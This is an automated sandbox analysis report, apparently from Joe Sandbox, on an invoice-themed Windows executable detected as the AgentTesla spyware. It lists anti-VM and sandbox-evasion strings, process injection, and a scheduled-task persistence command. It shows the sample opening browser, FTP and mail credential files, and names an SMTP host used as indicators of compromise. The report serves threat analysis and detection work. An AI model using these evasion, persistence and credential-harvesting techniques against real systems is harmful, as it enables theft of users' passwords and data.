                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Factura PO 1541973.exe PID: 6920, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWindow / User API: threadDelayed 922Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWindow / User API: threadDelayed 8896Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exe TID: 6924Thread sleep time: -102917s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exe TID: 6964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exe TID: 6000Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exe TID: 6012Thread sleep count: 922 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exe TID: 6012Thread sleep count: 8896 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exe TID: 6000Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeThread delayed: delay time: 102917Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Factura PO 1541973.exe, 00000004.00000003.871802773.0000000000E81000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlles\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: Factura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeMemory written: C:\Users\user\Desktop\Factura PO 1541973.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\lVzZfJoExG' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A03.tmp'Jump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeProcess created: C:\Users\user\Desktop\Factura PO 1541973.exe C:\Users\user\Desktop\Factura PO 1541973.exeJump to behavior
                      Source: Factura PO 1541973.exe, 00000004.00000002.911734288.0000000001420000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: Factura PO 1541973.exe, 00000004.00000002.911734288.0000000001420000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Factura PO 1541973.exe, 00000004.00000002.911734288.0000000001420000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: Factura PO 1541973.exe, 00000004.00000002.911734288.0000000001420000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Users\user\Desktop\Factura PO 1541973.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Users\user\Desktop\Factura PO 1541973.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.0.Factura PO 1541973.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Factura PO 1541973.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Factura PO 1541973.exe PID: 7136, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Factura PO 1541973.exe PID: 6920, type: MEMORY
                      Source: Yara matchFile source: 4.0.Factura PO 1541973.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Factura PO 1541973.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\Factura PO 1541973.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Factura PO 1541973.exe PID: 7136, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.0.Factura PO 1541973.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Factura PO 1541973.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Factura PO 1541973.exe PID: 7136, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Factura PO 1541973.exe PID: 6920, type: MEMORY
                      Source: Yara matchFile source: 4.0.Factura PO 1541973.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Factura PO 1541973.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Factura PO 1541973.exe.404fad0.2.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery321Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion141Cached Domain CredentialsVirtualization/Sandbox Evasion141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Factura PO 1541973.exe34%VirustotalBrowse
                      Factura PO 1541973.exe23%MetadefenderBrowse
                      Factura PO 1541973.exe34%ReversingLabsByteCode-MSIL.Spyware.Negasteal

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\lVzZfJoExG.exe23%MetadefenderBrowse
                      C:\Users\user\AppData\Roaming\lVzZfJoExG.exe34%ReversingLabsByteCode-MSIL.Spyware.Negasteal

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.Factura PO 1541973.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      4.0.Factura PO 1541973.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://wJzLSk.com0%Avira URL Cloudsafe
                      http://kCE9JYg5iS.com0%Avira URL Cloudsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.199.223
                      truefalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://api.ipify.org%GETMozilla/5.0Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://DynDns.comDynDNSFactura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://us2.smtp.mailhostbox.comFactura PO 1541973.exe, 00000004.00000002.912784647.0000000002DF5000.00000004.00000001.sdmpfalse
                          high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haFactura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFactura PO 1541973.exe, 00000000.00000002.655902349.0000000002DA1000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipFactura PO 1541973.exe, 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, Factura PO 1541973.exe, 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://wJzLSk.comFactura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssFactura PO 1541973.exe, 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmpfalse
                              high
                              http://kCE9JYg5iS.comFactura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, Factura PO 1541973.exe, 00000004.00000003.858298741.0000000000BC4000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.org%$Factura PO 1541973.exe, 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              208.91.199.223
                              us2.smtp.mailhostbox.comUnited States
                              394695PUBLIC-DOMAIN-REGISTRYUSfalse

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:433037
                              Start date:11.06.2021
                              Start time:08:03:27
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 43s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Factura PO 1541973.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@6/5@1/1
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 61
                              • Number of non-executed functions: 13
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 20.82.210.154, 20.54.104.15, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
